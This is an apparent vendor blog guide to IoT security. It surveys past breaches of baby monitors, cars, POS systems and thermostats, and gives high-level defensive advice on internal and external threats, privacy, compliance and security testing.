The ultimate guide to IoT security

What is IoT security?

By its nature, IoT opens up networks to the possibility of hacking. That’s because it involves connecting many objects or “things” to the internet that did not previously link to a network. For example, manufacturing companies connect IoT sensors to machinery on the factory floor, while homeowners purchase smart home devices such as thermostats, doorbell cameras, and light switches. 

With the innovation comes new vulnerability. Each connected thing, whether it’s a temperature sensor buried underground or a fitness watch, adds a doorway through which hackers could enter—and potentially bring down entire networks.

IoT security seeks to protect devices and networks, addressing the specific issues inherent to IoT deployments.

Table of contents:

Why is IoT security essential?
How should we approach IoT security?
How does your IoT security program measure up?
What are the biggest concerns for IoT security?
How do you test IoT security?
The future of IoT security

Why is IoT security essential?

Security is a point of pain for many IoT leaders. It’s complicated and overwhelming to secure so many devices and interconnected systems—and the statistics aren’t very encouraging. IoT attacks grew by 600 percent between 2016 and 2017, and 48 percent of businesses can’t detect if their IoT devices suffered a breach. 

Yet IoT security is essential if organizations want to safely realize the power of a connected world. Here’s why:

Data is very valuable—and worth protecting.

In many ways, data is the currency of our day. Organizations collect, store, and analyze tremendous amounts of information, using it to keep daily operations running smoothly and harvesting insights to make decisions. With so much at stake, cyberattacks can be devastating. For example, if a hacker penetrates a manufacturing company’s system and erases their predictive maintenance and productivity data, the company may be forced to halt production and struggle to find their way forward.

IoT security vulnerabilities undermine its success.

If IoT devices and networks are vulnerable to attack, they are of little use to an organization. Once the data is compromised or a hacker shuts down the network, the advantages are negated. Imagine if an agricultural grower sets up an IoT deployment to monitor plant growth, soil temperature and moisture, only to have the system crash when hackers discover and exploit a vulnerability. The grower has come to rely on IoT data to make decisions—and now that data has disappeared.

Cyberattacks on IoT devices can lead to compromised privacy and even physical injury.

Because IoT devices track many kinds of information, access to that width and breadth of data can give hackers unprecedented power. For example, if bad actors break into a network of connected cars, they could take control of the vehicles while passengers are inside—resulting in their injury or death. Cyberthreats against health IoT devices such as pacemakers are another example of serious security risks. The more personal information is collected and stored on digital devices, the more risk there is for organizations and consumers alike.

How should we approach IoT security?

Here’s some good news about IoT security risks: history repeats itself. While the details of cybersecurity attacks change from day to day, they’re often rehashes of the same incidents that have been occurring since the birth of the internet in the 1990s. 

The most effective approach to IoT security starts with taking a close look at the history of cyberattacks and security vulnerabilities across the computer network landscape, identifying the recurring themes, and creating a built-in IoT security plan for your deployment that addresses each common area of vulnerability. Let’s start by taking a closer look at a few IoT security breaches and hacks.

Examples of IoT security breaches and hacks

Because IoT hacks can happen to any type of connected thing, instances of security breaches include the unexpected and the bizarre.

A smart baby monitor camera sits on a table next to a child's toy

Baby monitors

Baby monitors have gone from being simple radio transmitters to sophisticated video devices connected to the internet via WiFi. These features enable parents to keep watch over a sleeping child from their smartphone, but they also create an open door for hackers. In 2018, parents of a four-month-old baby in Texas heard a stranger’s voice over their video monitor, threatening to kidnap their baby. Once they realized it was a hacker and not someone in their home, they disconnected the device and called the police. These types of hacks are not difficult for bad actors to instigate if device users rely on default passwords.

Connected cars

In 2015, two hackers remotely took control of a Jeep Cherokee using vulnerabilities in the car’s entertainment system to access its dashboard functions. The two hacker-researchers commandeered the car while a journalist was behind the wheel, initiating a series of unexpected disturbances and finally disabling the brakes, causing the driver to swerve into a ditch. The experiment demonstrates just how serious IoT security vulnerabilities can be.

Point of Sale (POS) Systems

In 2014, hackers used login information from an HVAC company to break into Target’s POS system. The HVAC company had login credentials with the retailer to carry out remote monitoring tasks, evaluating and adjusting energy consumption at retail stores. Once the hackers were into Target’s network, they uploaded malware to the POS systems and stole data from 40 million debit and credit cards in the U.S., Brazil, and Russia.

A woman changes the temperature on her smart thermostat

Thermostats

There have been a number of hacks to connected thermostats over the past few years, typically due to weak or compromised passwords. In 2016, hackers broke into the heating system at a pair of apartment buildings in southeast Finland, introducing a denial of service (DDoS) attack that disabled the heating system for nearly a week. And in 2019, a hacker broke into a Wisconsin couple’s smart home, turned the thermostat up to 90 degrees, and spoke to them through a camera in their kitchen.

How does your IoT security program measure up?

An IoT cyberattack can happen anywhere, to any kind of connected device. It’s essential to look at every network element and every piece of hardware as a potential entry point—and act aggressively to protect those doorways. 

Every successful IoT security program must address four basic areas. Before you do anything else, take a moment to assess the state of your organization’s IoT security protocol using this checklist.

How does your IoT security program address:

Internal threats?

(How do you ensure vendor alignment? What measures are in place to detect hidden malware and monitor logging practices? How do you detect internal bad actors?)

External threats?

(How does your organization safeguard against external hackers who may spread malware and perpetrate ransomware attacks?)

Privacy?

(Is encryption effective? Is your network private?)

Compliance?

(Which regulations are you subject to? How do you ensure compliance?)

If your responses were vague or incomplete, you’re not alone.

Cybersecurity is one of the major thorns in the side of IoT at the moment. As more devices, vendors, and networks become involved, ensuring security becomes increasingly complicated. But if you think critically and make sure you’re paying attention to each major area of concern, IoT security is quite achievable.

What are the biggest concerns for IoT security?

Let’s take a closer look at these four main areas of concern for IoT security.

A man and woman

Internal threats

The phrase “internal cyber threats” conjures up images of malicious employees who intentionally leak sensitive information. But while it’s important to safeguard against bad actors, the vast majority of internal threats in IoT networks come from ignorance or negligence about best practices. Here are a few essential areas to focus on when you’re creating or refining IoT security policies:

Vendor alignment

One weakness of IoT security occurs when organizations unite hardware and software elements from different vendors who may not be working together to achieve optimum security. For example, a connected car manufacturer may have a vendor deep inside their system who’s not worrying about security because they make a vehicle part that’s normally not connected to the internet. When connected, that part becomes a security risk. Ultimately, the weakest link in your chain of vendors becomes a potential entry point for hackers. To offset that risk, work toward vendor alignment: look for vendors who share your security standards and ensure that every connection point in your hardware and software chain is secured.

Intrusion detection systems

A software application or device that monitors your network for suspicious activity, an intrusion detection system is an essential step toward safeguarding against internal (and external) cyber threats. Intrusion detection systems may use signature-based detection to find malware or other bad patterns, or anomaly-based detection to highlight diversions from normal activity.

Employee adherence to cybersecurity best practices

Making sure employees are well-versed in cybersecurity best practices should be an ongoing effort in any organization, especially those utilizing or designing IoT devices. Because the threat landscape is always changing, it’s important to schedule frequent check-ins to keep teams in the loop.

Change management

A good change management system requires approval and record-keeping to prevent unauthorized changes from occurring. Change management reduces the risk caused by the human element, which can include errors as well as social engineering. It creates a standard process that all personnel must follow strictly for any changes to network access control or device management.

Principle of least privilege

An IoT device on your network shouldn’t have access to other devices on your network by default, because those unnecessary links create additional attack surfaces. Enforcing the Principle of Least Privilege helps to restrict access between devices. Role-based control, a tool within some IoT platforms that allows you to restrict network and account access depending on the person’s role, is another helpful security precaution for any company developing or deploying IoT.

External threats

Threats from outside your immediate IoT network can come from anywhere, in any number of forms. There’s no way to anticipate every possible threat, but there are things you can do to ensure network security and make it very difficult for a bad actor to break in.

Securing backdoors and open ports

Oversights such as backdoors and open ports can lead to serious cyberthreats. To the best of your organization’s ability, eliminate these open doors and utilize network monitoring, anti-malware solutions, and/or multiple firewalls as added layers of protection.

Firewalls

In IoT security, firewalls are essential—and should come in several layers. Network operators should implement multiple firewalls to detect and log anomalous traffic and unexpected port access attempts. Set up your system to trigger alerts so you’ll be notified immediately if something is amiss.

Password management

Everyone knows it’s important to use strong passwords and change them regularly—but many organizations still struggle to stay up-to-date on this key element of security. Some IoT devices come pre-loaded with default passwords set by the manufacturer, creating an open door for hackers to penetrate the network. If your devices operate with traditional passwords, change them often or consider using an automated password management system. Today’s cellular IoT devices may also use authentication as an additional layer of security, such as Hologram’s multi-factor authentication for connected devices.

Disaster recovery plan and data backup

Backing up your systems is a given, but with the amount of data gathered in today’s organizations, it can be an overwhelming task. Even if data is backed up, you need to make sure you can restore it quickly—so you can avoid costly network downtime. These details should be worked out in a disaster recovery plan (DRP), an essential roadmap to the policies and procedures your organization will use to cope with a physical disaster or large-scale cyberattack.

Laptop with memo sticks on the screen.

Privacy

Whether your IoT devices measure moisture levels in the soil or the heart rates of cardiac patients, the data they gather must be kept within prescribed boundaries of privacy. Data privacy means safeguarding information on its entire path from creation to processing—in the case of IoT, from the edge to the cloud and beyond—to ensure that third parties cannot gain access to it without authorization.

Data privacy policy

If your organization handles client or consumer information, it’s important to establish a data privacy policy to set the groundwork for how you will handle regulatory compliance and safeguard the data that passes through your network of IoT devices. Based on the policy, you can create a data privacy statement to share with clients.

Private IPs

A private IP is part of a private network, meaning that an internet destination cannot send traffic to it directly. The firewall intercepts the traffic and makes decisions on whether it goes through or not. Using private IP addresses (made possible when firewalls are in place) provides another layer of protection for your IoT devices.

Secure tunneling

Secure tunneling solutions (such as Hologram Spacebridge) allow you to tunnel into the security domain associated with your own devices. By creating a secure, authenticated tunnel, you can send inbound traffic to any port on an IoT device. Essentially, a tunnel is a closely guarded gate that lets you in to where you need to go.

Encryption

Encrypting data is a given for cybersecurity, but in the world of IoT, it’s not always end-to-end. That’s because IoT data often passes through different systems and software as it traverses the path from edge to cloud—making it harder to ensure constant encryption. Some companies are working toward open-source solutions that are compatible across platforms, but they’re still in development. With this awareness, work toward a solution that guarantees encryption for your IoT data, both in transit and at rest.

Compliance

Depending on your industry and location, IoT devices and computer networks will need to comply with a checklist of regulations created by a governing body. But while essential, regulatory compliance does not always add up to IoT security. They are different goals, and need to be approached differently.

Compliance does not equate security

Depending on your industry and location, IoT devices and computer networks will need to comply with a checklist of regulations created by a governing body. But while essential, regulatory compliance does not always add up to IoT security. They are different goals, and need to be approached differently.

Know the requirements and demonstrate compliance

While there’s no single federal law governing data privacy in the U.S., many states have passed their own. Ensure that you’re familiar with the government regulations and industry standards that apply to your organization, and have systems in place that can detect and demonstrate compliance. (For example, data protection services often generate periodic reports on regulatory compliance.)

Keep up with changes and updates

Local, state, and federal laws are always being added, along with additional requirements from governing bodies within industries. It’s essential to stay ahead of new regulations, so set up a system and regular meetings to review and plan for approaching changes.

How do you test IoT security?

Once you’ve evaluated your IoT security program and made changes to strengthen it, how can you ensure that your approach is working? Using standard cybersecurity testing methods, your team or a third party can evaluate the strength of your IoT security. Here’s how:

Penetration testing

Commonly used to test traditional computer networks, penetration testing can also identify vulnerabilities in an IoT network—but the process may be complicated. IoT devices and networks use a wide variety of architectures (SuperH, MIPS, or ARM, for example) and communication protocols (such as BLE, Zigbee, SDR, and Sigfox), which penetration testers must be familiar with. There are many moving parts in an IoT deployment, and it’s easy to miss potential points of vulnerability, so you might consider hiring a third party that specializes in IoT security testing.

Device hardware analysis

Analyzing and testing device hardware is another essential component to evaluating your IoT security. These penetration tests look at internal communications protocols such as UART, 12C, and SPI; check for open ports; experiment with the results of tampering; and carry out JTAG debugging.

Threat modeling

Threat models analyze applications to identify vulnerabilities and call attention to them. For IoT devices and networks, threat modeling provides a clear evaluation of the whole picture and highlights the possibility for specific incidents such as WiFi jamming, device hijacking, or the introduction of targeted malware.

The future of IoT security

The future of IoT depends on its security. As device and networking technology evolves, so will security safeguards and standards. Several organizations, including the IoT Security Foundation and GSMA, have already developed sets of security best practices and guidelines for IoT. Until there are overarching standards for IoT security, organizations and developers need to be extra vigilant about building security into devices and networks, staying up-to-date on the latest threats, and continuing to test and evaluate their approach to security.